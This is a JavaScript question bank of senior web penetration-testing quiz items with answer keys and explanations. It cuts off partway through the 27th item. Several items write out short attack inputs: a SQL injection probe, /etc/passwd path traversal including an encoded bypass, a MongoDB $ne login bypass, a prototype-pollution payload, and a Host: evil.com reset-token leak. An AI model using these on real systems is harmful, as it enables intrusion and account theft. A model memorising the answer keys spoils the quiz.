// Web App Pen-Testing — senior-level PT questions.
// Authority sources: PortSwigger Web Security Academy, OWASP Top 10, OWASP Testing Guide v4, OWASP ASVS.
// Discovery sources are not used as citations.

window.QUESTION_BANK.web = [
  {
    id: 'web-001',
    topic: 'web',
    subtopic: 'ssrf',
    difficulty: 'senior',
    question: 'You suspect a blind SSRF on an internal endpoint that does not return any response body to the user. Which technique is the most reliable for confirming the vulnerability?',
    choices: [
      'Try injecting JavaScript and watch the rendered DOM for execution',
      'Use a Burp Collaborator (out-of-band) payload and watch for incoming HTTP/DNS interactions',
      'Time the response — anything over 2 seconds confirms the SSRF',
      'Submit a malformed URL and read the verbose error message returned to the user',
    ],
    correctIndex: 1,
    explanation: 'Blind SSRF returns no observable response, so confirmation requires an out-of-band channel. A Burp Collaborator (or similar canary like interact.sh) gives you a unique URL whose DNS/HTTP hits prove the back-end fetched it. PortSwigger calls this the standard approach for blind SSRF.',
    distractorRationale: {
      0: 'JavaScript execution tests XSS, not SSRF. SSRF is a server-side request, so client-side rendering is irrelevant.',
      2: 'Timing differences are unreliable for confirmation — they can be caused by load, caching, or rate-limiting, not by an SSRF.',
      3: 'A blind SSRF by definition does not surface error messages to the user; even when error messages exist they are not a reliable confirmation signal.',
    },
    source: { name: 'PortSwigger Web Security Academy — SSRF (blind)', url: 'https://portswigger.net/web-security/ssrf/blind' },
  },

  {
    id: 'web-002',
    topic: 'web',
    subtopic: 'sql-injection',
    difficulty: 'senior',
    question: 'A search field passes user input into a SELECT query but throws no error and returns no obvious data difference. Which class of SQL injection is most appropriate to attempt next?',
    choices: [
      'Union-based — read data through additional SELECT columns',
      'Error-based — coerce a verbose database error',
      'Blind boolean / time-based — infer data through truthy/falsy responses or timing',
      'Stored — write a payload that fires on a different page',
    ],
    correctIndex: 2,
    explanation: 'When the application returns no error and no visible data delta, blind SQLi is the appropriate path. You exfiltrate one bit at a time using boolean conditions (page differences) or time delays (e.g., SLEEP/WAITFOR). PortSwigger documents this exact decision flow.',
    distractorRationale: {
      0: 'Union-based requires the original query to be a SELECT and that you can see returned columns reflected somewhere. With no visible data difference there is no place to reflect a UNION result.',
      1: 'Error-based requires the application to surface DB error text, which the question explicitly says does not happen.',
      3: 'Stored SQLi is about persistence of payload, not detection technique. Its choice does not depend on whether the current response is observable.',
    },
    source: { name: 'PortSwigger Web Security Academy — Blind SQL Injection', url: 'https://portswigger.net/web-security/sql-injection/blind' },
  },

  {
    id: 'web-003',
    topic: 'web',
    subtopic: 'xss',
    difficulty: 'senior',
    question: 'A page reads a value from `location.hash` and writes it into the DOM via `innerHTML` with no server interaction. The payload never appears in HTTP requests. Which XSS class is this and why does it matter for testing methodology?',
    choices: [
      'Reflected XSS — server-side input filter must be tested',
      'Stored XSS — payload is persisted in a database',
      'DOM-based XSS — vulnerability is purely client-side, server logs will not show the payload',
      'Self-XSS — does not require any further testing',
    ],
    correctIndex: 2,
    explanation: 'DOM-based XSS sinks (e.g., innerHTML) consume sources (e.g., location.hash) entirely on the client, so the server never sees the payload. This is important because WAFs and server logs will not detect or block the attack — testing must be done in the browser. PortSwigger and the OWASP DOM-XSS guide both classify this case as DOM-based.',
    distractorRationale: {
      0: 'Reflected XSS requires the malicious string to round-trip through an HTTP request and response from the server, which is explicitly not happening here.',
      1: 'Stored XSS requires server-side persistence of the payload, but the payload never reaches the server.',
      3: 'Self-XSS is a social-engineering category where the user is tricked into pasting code into their own console; that is not what this scenario describes.',
    },
    source: { name: 'PortSwigger Web Security Academy — DOM-based vulnerabilities', url: 'https://portswigger.net/web-security/dom-based' },
  },

  {
    id: 'web-004',
    topic: 'web',
    subtopic: 'jwt',
    difficulty: 'senior',
    question: 'A web application validates JWTs using RS256. You change the `alg` header to `HS256` and sign the token with the public RSA key (which the app exposes at /jwks.json). Which class of vulnerability are you exploiting?',
    choices: [
      'JWT replay — reusing an old token after expiry',
      'Algorithm confusion — forcing a verifier expecting an asymmetric algorithm to use the public key as an HMAC secret',
      'Key disclosure — direct read of the private key from disk',
      'JWT injection into a SQL query',
    ],
    correctIndex: 1,
    explanation: 'JWT algorithm confusion happens when a verifier accepts whatever `alg` the token declares. Switching from RS256 to HS256 makes the verifier treat the public key as an HMAC secret, so an attacker who knows the public key can forge valid tokens. PortSwigger documents this as one of the headline JWT attacks.',
    distractorRationale: {
      0: 'Replay reuses the original token unchanged; here we are forging a new one with a different signing algorithm.',
      2: 'The private key is never disclosed in this attack — only the public key is needed, which is by design public.',
      3: 'The exploit does not involve injecting into SQL; it is purely an authentication-bypass against the token verifier.',
    },
    source: { name: 'PortSwigger Web Security Academy — JWT algorithm confusion', url: 'https://portswigger.net/web-security/jwt/algorithm-confusion' },
  },

  {
    id: 'web-005',
    topic: 'web',
    subtopic: 'access-control',
    difficulty: 'senior',
    question: 'An e-commerce app exposes /api/orders/123 where 123 is a numeric order ID. Changing it to /api/orders/124 returns another customer\'s order. What is the precise OWASP/PortSwigger name for this flaw?',
    choices: [
      'Cross-Site Request Forgery (CSRF)',
      'Insecure Direct Object Reference (IDOR) — a type of broken access control',
      'Server-Side Request Forgery (SSRF)',
      'Mass assignment',
    ],
    correctIndex: 1,
    explanation: 'IDOR is when an object identifier is exposed in a request and the server fails to verify the requester is authorized for that object. OWASP classifies it under Broken Access Control (A01 in the 2021 Top 10). PortSwigger\'s access-control material covers it explicitly.',
    distractorRationale: {
      0: 'CSRF tricks an authenticated user\'s browser into sending a state-changing request; this is just an unauthorized read by ID enumeration.',
      2: 'SSRF is the server fetching attacker-controlled URLs, not horizontal access bypass.',
      3: 'Mass assignment is when the framework binds extra fields from the request body into a model. Different vulnerability class.',
    },
    source: { name: 'PortSwigger Web Security Academy — Access control vulnerabilities (IDOR)', url: 'https://portswigger.net/web-security/access-control/idor' },
  },

  {
    id: 'web-006',
    topic: 'web',
    subtopic: 'request-smuggling',
    difficulty: 'senior',
    question: 'A front-end uses Content-Length to determine request boundaries, while the back-end uses Transfer-Encoding. Which HTTP Request Smuggling variant does this enable?',
    choices: [
      'CL.TE — front-end uses Content-Length, back-end uses Transfer-Encoding',
      'TE.CL — front-end uses Transfer-Encoding, back-end uses Content-Length',
      'TE.TE — both use Transfer-Encoding but parse it differently',
      'CL.0 — request has no body at all',
    ],
    correctIndex: 0,
    explanation: 'CL.TE is named after which header each hop respects: front-end honors Content-Length, back-end honors Transfer-Encoding. The desync lets an attacker hide a second request inside the first. PortSwigger\'s research and Web Security Academy define the naming.',
    distractorRationale: {
      1: 'TE.CL is the inverse — front-end uses TE, back-end uses CL — which is not what the question describes.',
      2: 'TE.TE refers to both ends honoring TE but disagreeing on parsing (e.g., obfuscated headers); the question says one side uses CL.',
      3: 'CL.0 is a more recent variant where the front-end uses Content-Length but the back-end treats certain requests as having no body; not what the prompt describes.',
    },
    source: { name: 'PortSwigger Web Security Academy — HTTP Request Smuggling', url: 'https://portswigger.net/web-security/request-smuggling' },
  },

  {
    id: 'web-007',
    topic: 'web',
    subtopic: 'ssti',
    difficulty: 'senior',
    question: 'You suspect Server-Side Template Injection in a Jinja2 (Python/Flask) app. Which payload is the canonical detection probe?',
    choices: [
      '`<script>alert(1)</script>`',
      "`{{7*7}}` — if the response contains 49, the input is being evaluated as a template",
      "`' OR 1=1 -- `",
      '`../../../../etc/passwd`',
    ],
    correctIndex: 1,
    explanation: '{{7*7}} is the standard SSTI probe: in a templated context the server evaluates the expression and returns 49, while a non-templated context echoes the literal string. This works for Jinja2, Twig, Mustache and most other engines that use {{...}} syntax. PortSwigger documents this exact methodology.',
    distractorRationale: {
      0: '<script>alert(1)</script> tests for XSS, which is client-side; SSTI executes server-side.',
      2: "`' OR 1=1 -- ` is a SQL injection probe — different sink and different evaluation context.",
      3: '../../../../etc/passwd tests for path traversal / LFI, not template evaluation.',
    },
    source: { name: 'PortSwigger Web Security Academy — Server-Side Template Injection', url: 'https://portswigger.net/web-security/server-side-template-injection' },
  },

  {
    id: 'web-008',
    topic: 'web',
    subtopic: 'cors',
    difficulty: 'senior',
    question: 'An API responds with `Access-Control-Allow-Origin: *` AND `Access-Control-Allow-Credentials: true`. Which statement is correct?',
    choices: [
      'This is a high-severity misconfiguration — any origin can read authenticated responses',
      'Modern browsers reject this combination, so the server config is effectively safe',
      'It is fine because CORS only governs writes, not reads',
      'It only matters if the API uses HTTP basic authentication',
    ],
    correctIndex: 1,
    explanation: 'The CORS specification forbids combining the wildcard origin with credentials — browsers will reject the response and refuse to expose it to JavaScript. The server config is sloppy and should be fixed, but it does not in itself create exploitable cross-origin reads of authenticated content. PortSwigger and the Fetch spec both describe this rule.',
    distractorRationale: {
      0: 'Browsers actively reject `*` with credentials, so the wildcard alone does not let third-party sites read authenticated responses.',
      2: 'CORS governs read access via JavaScript (XHR/fetch) — this is a misconception. The relevant point is the credentials/wildcard interaction, not reads vs writes.',
      3: 'CORS applies regardless of authentication scheme (cookies, bearer tokens, HTTP auth). The combination is forbidden in all credentialed cases.',
    },
    source: { name: 'PortSwigger Web Security Academy — CORS', url: 'https://portswigger.net/web-security/cors' },
  },

  {
    id: 'web-009',
    topic: 'web',
    subtopic: 'file-upload',
    difficulty: 'senior',
    question: 'An upload endpoint blocks files whose Content-Type header is not `image/png`. As a tester you change the header from `application/x-php` to `image/png` and the upload succeeds. What additional check is the strongest server-side defence against weaponising this?',
    choices: [
      'Reading the actual file magic bytes (server-side content sniffing) and rejecting executables',
      'Trusting the Content-Type header but logging mismatches',
      'Renaming the uploaded file to a random name only',
      'Storing the file under the web root with original extension',
    ],
    correctIndex: 0,
    explanation: 'The Content-Type header is attacker-controlled and proves nothing. The reliable defence is to inspect the file\'s actual magic bytes server-side and reject anything whose detected type does not match the allow-list, combined with not serving uploads from an executable path. OWASP\'s file upload guidance covers this layered approach.',
    distractorRationale: {
      1: 'Logging is observability, not enforcement — the malicious file still lands.',
      2: 'A random filename does not stop a webshell from executing if it is served from a path that interprets it.',
      3: 'Storing under the web root with original extension is the worst of both — it lets a uploaded .php execute.',
    },
    source: { name: 'OWASP Web Security Testing Guide — File Upload', url: 'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/10-Business_Logic_Testing/09-Test_Upload_of_Unexpected_File_Types' },
  },

  {
    id: 'web-010',
    topic: 'web',
    subtopic: 'oauth',
    difficulty: 'senior',
    question: 'An OAuth 2.0 authorisation-code flow does NOT validate the `state` parameter. Which attack does this primarily enable?',
    choices: [
      'Token replay — old tokens can be reused after revocation',
      'Cross-Site Request Forgery (CSRF) on the OAuth callback, letting an attacker bind their account to a victim\'s session',
      'Open redirect to phishing pages',
      'Mass assignment of token scopes',
    ],
    correctIndex: 1,
    explanation: 'The state parameter is the OAuth client\'s CSRF token: it binds the auth code returned from the IdP to the same user-agent that started the flow. Without it, an attacker can paste their own auth code into a victim\'s callback and link the attacker\'s account to the victim\'s session. PortSwigger\'s OAuth labs cover this exact attack.',
    distractorRationale: {
      0: 'Token replay involves access tokens, not the state parameter.',
      2: 'Open redirect is a separate misconfiguration around the redirect_uri allow-list.',
      3: 'Mass assignment is a framework-level data-binding flaw, unrelated to OAuth state.',
    },
    source: { name: 'PortSwigger Web Security Academy — OAuth: missing state', url: 'https://portswigger.net/web-security/oauth' },
  },

  {
    id: 'web-011',
    topic: 'web',
    subtopic: 'xxe',
    difficulty: 'senior',
    question: 'You upload a SOAP/XML payload containing a DOCTYPE block referencing an external entity. The server returns the contents of /etc/passwd in the response. Which class of vulnerability is this?',
    choices: [
      'XML Schema Validation (XSD) bypass',
      'XML External Entity (XXE) injection',
      'XPath injection',
      'XML signature stripping',
    ],
    correctIndex: 1,
    explanation: 'XXE occurs when an XML parser processes external entity references defined in a DOCTYPE. The parser dereferences `SYSTEM` URLs (file://, http://) and substitutes the contents into the document, leading to file disclosure or SSRF. PortSwigger\'s XXE topic covers detection and exploitation in detail.',
    distractorRationale: {
      0: 'Schema validation issues prevent enforcement of structure, but they do not by themselves disclose files.',
      2: 'XPath injection manipulates XPath queries to bypass auth or extract data, not to read files via entity expansion.',
      3: 'Signature stripping is a SAML/XML-DSig attack, unrelated to entity processing.',
    },
    source: { name: 'PortSwigger Web Security Academy — XXE injection', url: 'https://portswigger.net/web-security/xxe' },
  },

  {
    id: 'web-012',
    topic: 'web',
    subtopic: 'deserialization',
    difficulty: 'senior',
    question: 'A Java app deserialises base64-encoded objects from a cookie using `ObjectInputStream.readObject()`. Which tooling is most appropriate to generate a payload that achieves RCE?',
    choices: [
      'sqlmap',
      'ysoserial — generates gadget chains for known vulnerable libraries on the classpath',
      'Burp Intruder with the default fuzzing list',
      'Hashcat',
    ],
    correctIndex: 1,
    explanation: 'ysoserial produces serialised Java payloads using gadget chains drawn from common libraries (Commons-Collections, Spring, Groovy, Hibernate). When the target deserialises one of these gadgets, it triggers code execution. PortSwigger and the OWASP deserialization cheat sheet both reference ysoserial as the canonical tool.',
    distractorRationale: {
      0: 'sqlmap targets SQL injection, not Java deserialization.',
      2: 'Generic fuzzing rarely produces a working gadget chain — you need a serialised object that triggers a specific gadget on the classpath.',
      3: 'Hashcat is a password cracker; it does not produce serialised payloads.',
    },
    source: { name: 'OWASP Deserialization Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html' },
  },

  {
    id: 'web-013',
    topic: 'web',
    subtopic: 'race-conditions',
    difficulty: 'senior',
    question: 'A "redeem coupon" endpoint accepts a one-time code. You discover that submitting the same code in many parallel requests credits the account multiple times. Which Burp feature is the standard tool for this attack?',
    choices: [
      'Burp Repeater\'s Send Group in parallel (single-packet attack via HTTP/2 or "last-byte sync")',
      'Burp Intruder pitchfork mode at default thread count',
      'Burp Comparer',
      'Burp Decoder',
    ],
    correctIndex: 0,
    explanation: 'PortSwigger\'s race-condition research and the Send Group feature in Repeater allow you to dispatch many requests to land at the server within a sub-millisecond window using the single-packet attack (HTTP/2) or last-byte synchronisation. This minimises network jitter and exposes TOCTOU windows that ordinary thread fuzzing misses.',
    distractorRationale: {
      1: 'Default Intruder threading does not synchronise the requests tightly enough; jitter typically washes out the race window.',
      2: 'Comparer is a diff tool — useful for analysis but not for sending parallel requests.',
      3: 'Decoder converts encodings; it does not send traffic.',
    },
    source: { name: 'PortSwigger Web Security Academy — Race Conditions', url: 'https://portswigger.net/web-security/race-conditions' },
  },

  {
    id: 'web-014',
    topic: 'web',
    subtopic: 'host-header',
    difficulty: 'senior',
    question: 'An app generates password-reset emails using the request\'s `Host` header to build the link. What is the senior-level attack and the recommended mitigation?',
    choices: [
      'Attacker sets `Host: evil.com`; victim clicks the reset link sent in the email and the token is exfiltrated to attacker. Mitigation: validate the Host header against an allow-list and use an absolute URL configured server-side.',
      'Attacker sets a long Host header to overflow the buffer. Mitigation: increase server header size limit.',
      'Attacker requests with no Host header. Mitigation: enforce HTTP/2 only.',
      'Attacker uses an IPv6 Host header. Mitigation: disable IPv6.',
    ],
    correctIndex: 0,
    explanation: 'Trusting the Host header for password-reset link construction is a long-standing vulnerability: the attacker submits a reset for the victim with `Host: evil.com`, and when the victim clicks the link, the token leaks to the attacker. The fix is to validate Host against a known allow-list or hard-code the public URL. PortSwigger documents this exact case.',
    distractorRationale: {
      1: 'Buffer overflows are not the issue with HTTP headers in modern stacks; the vulnerability is logical, not memory-corruption.',
      2: 'A missing Host header is malformed but not the attack.',
      3: 'IPv6 Host headers are valid; disabling IPv6 is unrelated.',
    },
    source: { name: 'PortSwigger Web Security Academy — HTTP Host header attacks', url: 'https://portswigger.net/web-security/host-header' },
  },

  {
    id: 'web-015',
    topic: 'web',
    subtopic: 'clickjacking',
    difficulty: 'senior',
    question: 'A page lacks `X-Frame-Options` and the modern `Content-Security-Policy: frame-ancestors`. Which header should you recommend, and which one is now considered the correct primary defence?',
    choices: [
      '`X-Frame-Options: DENY` only — frame-ancestors is deprecated',
      '`Content-Security-Policy: frame-ancestors \'self\'` (the spec-mandated successor); X-Frame-Options can be added for legacy browsers but CSP frame-ancestors is the modern primary defence',
      '`X-XSS-Protection: 1`',
      '`Strict-Transport-Security: max-age=31536000`',
    ],
    correctIndex: 1,
    explanation: 'The CSP-2 spec deprecates X-Frame-Options in favour of `frame-ancestors`, which is more flexible (supports multiple origins, schemes) and is honoured by all modern browsers. MDN, OWASP and the W3C spec all recommend frame-ancestors as the primary clickjacking control with X-Frame-Options as a legacy fallback.',
    distractorRationale: {
      0: 'X-Frame-Options is the legacy control; frame-ancestors is the spec-mandated successor.',
      2: 'X-XSS-Protection targeted browser XSS auditors and is itself deprecated; it has nothing to do with framing.',
      3: 'HSTS forces TLS, unrelated to clickjacking.',
    },
    source: { name: 'OWASP Clickjacking Defense Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html' },
  },

  {
    id: 'web-016',
    topic: 'web',
    subtopic: 'web-cache-poisoning',
    difficulty: 'senior',
    question: 'Which characteristic of an HTTP request is the most common foothold for web cache poisoning?',
    choices: [
      'The cookie header — it is always part of the cache key',
      'An "unkeyed input" — a request header (e.g., X-Forwarded-Host, X-Original-URL) that the back-end reflects into the response but the cache ignores when computing the cache key',
      'The query string — it is never part of the cache key',
      'The user-agent — it is always uppercase-normalised by caches',
    ],
    correctIndex: 1,
    explanation: 'Cache poisoning leverages "unkeyed inputs": headers that influence the response but are not included in the cache key. An attacker poisons the cached response by sending a malicious header value once; subsequent victims fetching from the cache get the malicious response. James Kettle / PortSwigger\'s cache poisoning research is the canonical reference.',
    distractorRationale: {
      0: 'Cookies are usually included in cache keys (or not cached at all). They are not the typical poisoning vector.',
      2: 'Query strings are usually keyed by caches.',
      3: 'User-agent normalisation is a sometimes-true detail but not the core poisoning mechanism.',
    },
    source: { name: 'PortSwigger Web Security Academy — Web cache poisoning', url: 'https://portswigger.net/web-security/web-cache-poisoning' },
  },

  {
    id: 'web-017',
    topic: 'web',
    subtopic: 'prototype-pollution',
    difficulty: 'senior',
    question: 'You merge user-supplied JSON into a config object using a vulnerable `merge()` function in Node.js. The user submits `{"__proto__": {"isAdmin": true}}`. Which class of vulnerability is this and why is it dangerous?',
    choices: [
      'JSON injection — the parser executes arbitrary code',
      'Prototype pollution — modifies `Object.prototype`, so subsequent property reads anywhere in the app see the polluted value (potential auth bypass / RCE depending on gadgets)',
      'JWT tampering',
      'NoSQL injection',
    ],
    correctIndex: 1,
    explanation: 'Prototype pollution mutates `Object.prototype`. After pollution, every newly created object inherits the polluted property unless explicitly overridden. In real apps, this can be chained into auth bypass or RCE through gadgets in popular libraries. PortSwigger and OWASP have detailed write-ups.',
    distractorRationale: {
      0: 'JSON.parse does not execute code; the JSON itself is data.',
      2: 'JWT tampering involves modifying token claims, not prototype chains.',
      3: 'NoSQL injection manipulates query operators ($gt, $ne) — different vulnerability class.',
    },
    source: { name: 'PortSwigger Web Security Academy — Prototype Pollution', url: 'https://portswigger.net/web-security/prototype-pollution' },
  },

  {
    id: 'web-018',
    topic: 'web',
    subtopic: 'open-redirect',
    difficulty: 'senior',
    question: 'A login flow redirects to `?next=/dashboard`. You change `next=//evil.com` and the browser is redirected to evil.com. In modern AppSec impact terms, why is open redirect rarely standalone-critical, and when does it become high-severity?',
    choices: [
      'It is never exploitable',
      'Open redirect alone is usually low/info; it becomes high-severity when chained with OAuth (state-less or redirect_uri matching loose) to leak auth codes, or used to bypass SSRF allow-lists',
      'It is always critical because it is on the OWASP Top 10',
      'It only matters on shared hosting',
    ],
    correctIndex: 1,
    explanation: 'Modern triagers treat plain open redirect as low-severity phishing. The senior-level point is the chain: when an OAuth provider does loose redirect_uri matching, a same-origin open redirect can be used to leak authorization codes; open redirects can also bypass SSRF or CSP allow-lists. CVSS context is what raises severity.',
    distractorRationale: {
      0: 'It is exploitable for phishing; the question is severity.',
      2: 'Open redirect is not its own item on the current OWASP Top 10 and is generally lower-severity.',
      3: 'Hosting topology is irrelevant.',
    },
    source: { name: 'OWASP — Unvalidated Redirects and Forwards Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html' },
  },

  {
    id: 'web-019',
    topic: 'web',
    subtopic: 'path-traversal',
    difficulty: 'senior',
    question: 'A download endpoint accepts `?file=report.pdf` and serves files from `/var/www/uploads/`. You try `?file=../../etc/passwd` and get blocked, but `?file=..%2f..%2fetc/passwd` works. What lesson does this teach about input validation?',
    choices: [
      'URL-encoding bypasses are obsolete in modern frameworks',
      'Sanitisation must happen AFTER URL/Unicode decoding (canonicalisation), and the cleanest defence is to resolve to an absolute path then verify the canonical path is still under the allowed directory',
      'Always use HTTPS to prevent traversal',
      'Path traversal only works on Windows',
    ],
    correctIndex: 1,
    explanation: 'Sanitisation done before canonicalisation can be bypassed by encoding (`%2f`, `%252f` for double-encoded), unicode (`..%c0%af`), or Windows-style backslashes. The robust defence is to decode and canonicalise the path first, then verify the resolved path stays within the allow-listed root. OWASP\'s testing guide is explicit on this.',
    distractorRationale: {
      0: 'Encoding bypasses are very much still relevant — they appear regularly in CVEs.',
      2: 'HTTPS protects in transit; it does nothing for path traversal.',
      3: 'Path traversal works on Linux too — /etc/passwd is the classic target.',
    },
    source: { name: 'OWASP Web Security Testing Guide — Testing for Path Traversal', url: 'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include' },
  },

  {
    id: 'web-020',
    topic: 'web',
    subtopic: 'csrf',
    difficulty: 'senior',
    question: 'An API uses `SameSite=Lax` on its session cookie and no CSRF token. Which scenario is most likely STILL exploitable as CSRF?',
    choices: [
      'A cross-site form POST to a state-changing endpoint',
      'A cross-site GET that has side effects (e.g., `/transfer?to=evil&amount=1000`) — Lax allows top-level GETs',
      'Any cross-site fetch() call',
      'A fetch() with credentials: omit',
    ],
    correctIndex: 1,
    explanation: 'SameSite=Lax blocks cross-site cookies on cross-site POSTs and most subresource requests, but it allows cookies on top-level navigations (clicking a link). If a state-changing endpoint accepts GET, an attacker-crafted link still triggers CSRF. The standard fix is: never allow GET to change state, plus add CSRF tokens / SameSite=Strict for sensitive flows.',
    distractorRationale: {
      0: 'Cross-site form POSTs are blocked by SameSite=Lax (cookie not sent), so this is the protected case.',
      2: 'fetch() with default credentials respects SameSite, so cross-site fetches do not carry the cookie.',
      3: '`credentials: omit` explicitly tells fetch not to send cookies — no CSRF possible.',
    },
    source: { name: 'OWASP CSRF Prevention Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html' },
  },

  {
    id: 'web-021',
    topic: 'web',
    subtopic: 'subdomain-takeover',
    difficulty: 'senior',
    question: 'An organisation has `blog.example.com CNAME ghost.example.io.` but the underlying Ghost site has been deleted. What attack is now possible and what is the canonical mitigation?',
    choices: [
      'Subdomain takeover — an attacker registers the dangling third-party resource and serves arbitrary content under the trusted FQDN, enabling cookie theft (if cookies are scoped to *.example.com), phishing, and CORS bypass. Mitigation: remove dangling CNAMEs as part of decommission, and run continuous DNS hygiene scans.',
      'DNS cache poisoning — the attacker sets a TTL of 0',
      'BGP hijacking — the attacker announces the IP block',
      'TLS downgrade — the attacker forces HTTP/1.0',
    ],
    correctIndex: 0,
    explanation: 'Subdomain takeover is the dangling-DNS-pointer issue: when a CNAME points at a third-party service that has been removed, an attacker who registers the freed name on the third-party platform serves content under your subdomain. OWASP and the EdOverflow takeover guide both treat this as a recurring high-severity finding.',
    distractorRationale: {
      1: 'DNS cache poisoning targets resolvers, not third-party service decommissions.',
      2: 'BGP hijacking is at the routing layer, not DNS.',
      3: 'TLS downgrade is a transport attack; not what dangling CNAMEs cause.',
    },
    source: { name: 'OWASP Web Security Testing Guide — Test for Subdomain Takeover', url: 'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/10-Test_for_Subdomain_Takeover' },
  },

  {
    id: 'web-022',
    topic: 'web',
    subtopic: 'graphql',
    difficulty: 'senior',
    question: 'You are testing a GraphQL endpoint. Which check is the MOST distinctive senior-level finding, beyond the OWASP API Top 10 basics?',
    choices: [
      'Verifying HTTPS is enabled',
      'Sending an introspection query (`__schema`) to enumerate types/queries/mutations, then probing for missing object-level authorisation, batching/aliasing abuse, and field-suggestion oracles even when introspection is disabled',
      'Checking if cookies have HttpOnly',
      'Confirming that the response is JSON',
    ],
    correctIndex: 1,
    explanation: 'GraphQL-specific senior tests: introspection enumeration, batching and aliasing to bypass rate-limit / brute-force, field-suggestion oracles when introspection is off, and broken object-level authorisation across nested queries (BOLA in OWASP API Top 10). Generic web checks (HTTPS, HttpOnly) miss the protocol-specific risks.',
    distractorRationale: {
      0: 'HTTPS is a baseline, not a GraphQL-specific finding.',
      2: 'HttpOnly is generic web hardening.',
      3: 'JSON content type is just protocol mechanics.',
    },
    source: { name: 'OWASP GraphQL Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html' },
  },

  {
    id: 'web-023',
    topic: 'web',
    subtopic: 'nosql-injection',
    difficulty: 'senior',
    question: 'A login endpoint accepts JSON `{"user":"admin","pass":"x"}` and queries MongoDB. Which payload is a classic NoSQL auth bypass and why does it work?',
    choices: [
      '`{"user":"admin","pass":{"$ne":null}}` — the `$ne` operator turns the password check into "not null", which any stored hash satisfies, returning the admin user',
      '`{"user":"admin\'--","pass":"x"}` — SQL comment',
      '`{"user":"<script>","pass":"x"}` — XSS payload',
      '`{"user":"../admin","pass":"x"}` — path traversal',
    ],
    correctIndex: 0,
    explanation: 'When the framework deserialises JSON straight into a query, MongoDB query operators ($ne, $gt, $regex) become available. `$ne: null` matches any stored password, bypassing authentication. The fix is to coerce expected primitives (string only) before constructing the query. OWASP and PortSwigger both cover NoSQLi.',
    distractorRationale: {
      1: 'SQL comment syntax does not affect MongoDB queries.',
      2: 'XSS is a client-side concern, not a NoSQL operator injection.',
      3: 'Path traversal is for file-system access, not query operators.',
    },
    source: { name: 'PortSwigger Web Security Academy — NoSQL injection', url: 'https://portswigger.net/web-security/nosql-injection' },
  },

  {
    id: 'web-024',
    topic: 'web',
    subtopic: 'command-injection',
    difficulty: 'senior',
    question: 'A diagnostics endpoint accepts a hostname and runs `ping -c 1 <hostname>` via `os.system`. The developer added a regex to block spaces. What is the cleanest senior-level recommendation?',
    choices: [
      'Add more regex to block more characters',
      'Move from string concatenation + shell to an argv-based exec API (`subprocess.run([...], shell=False)`), and apply strict allow-list validation (e.g., RFC-compliant hostname only) before execution',
      'Add a CAPTCHA',
      'Run the command as a different user',
    ],
    correctIndex: 1,
    explanation: 'Defending against command injection by blacklisting characters is fragile — substitutions, encoding and shell features keep finding bypasses. The proper fix is to remove the shell from the path: pass arguments as a list to the OS, never concatenate user input into a shell string, and validate against an allow-list. OWASP\'s command-injection guidance is explicit.',
    distractorRationale: {
      0: 'Blacklists are forever-leaky; this is an inferior strategy.',
      2: 'CAPTCHAs slow but do not block injection.',
      3: 'Reduced privilege limits damage but does not prevent the injection.',
    },
    source: { name: 'OWASP Command Injection Defense Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html' },
  },

  {
    id: 'web-025',
    topic: 'web',
    subtopic: '2fa-bypass',
    difficulty: 'senior',
    question: 'A 2FA-protected login submits the OTP to `/api/2fa/verify` with `{"user_id":1234,"otp":"123456"}`. After submitting your own OTP, you change `user_id` to a target\'s and the response says "verified". What is this and why does it slip past most QA?',
    choices: [
      'Time-based brute force — the OTP must be re-entered',
      'A horizontal access-control / IDOR flaw on the 2FA verification endpoint: the back-end checks the OTP against the supplied user_id rather than against the user established by the session, so the attacker uses their own valid OTP to clear the 2FA gate for any account',
      'A timing side-channel — the response delay leaks OTP bits',
      'A Content-Type confusion',
    ],
    correctIndex: 1,
    explanation: 'A frequent senior-level real-world bug: the 2FA verifier trusts a request-supplied user_id instead of the session subject. The attacker generates their own OTP, then switches user_id to the target — server-side authorisation is missing. PortSwigger\'s authentication labs document multiple variants of this.',
    distractorRationale: {
      0: 'Brute force against 6-digit OTPs is a different class (rate-limit issue), not what is described.',
      2: 'Timing side-channels would not produce a clean "verified" response on a forged user_id.',
      3: 'Content-Type confusion is unrelated to authorisation logic.',
    },
    source: { name: 'PortSwigger Web Security Academy — Authentication: 2FA bypass', url: 'https://portswigger.net/web-security/authentication/multi-factor' },
  },

  {
    id: 'web-026',
    topic: 'web',
    subtopic: 'session-fixation',
    difficulty: 'senior',
    question: 'After a user authenticates, the application reuses the pre-authentication session ID rather than issuing a new one. What attack does this enable?',
    choices: [
      'Session fixation — attacker sets the victim\'s session ID before login (via URL parameter, cookie injection, or related-domain cookie); after the victim logs in, the attacker reuses that same ID and is now authenticated as the victim',
      'CSRF',
      'Clickjacking',
      'XXE',
    ],
    correctIndex: 0,
    explanation: 'Session fixation succeeds when the application keeps a pre-auth session valid through login. The mitigation is to invalidate the existing session and issue a fresh one upon successful authentication — every framework supports this (`session.regenerate` / equivalent). OWASP\'s session management cheat sheet is explicit.',
    distractorRationale: {
      1: 'CSRF tricks the browser into making requests; it is not about session ID reuse.',
      2: 'Clickjacking is a UI redress attack.',
      3: 'XXE involves XML parser entity processing — different class.',
    },
    source: { name: 'OWASP Session Management Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html' },
  },

  {
    id: 'web-027',
    topic: 'web',
    subtopic: 'mass-assignment',
    difficulty: 'senior',
    question: 'A registration endpoint accepts JSON and the framework auto-binds it to the User model. You include `"isAdmin": true` and the new account has admin privileges. What is this called and how is it fixed?',
    choices: [
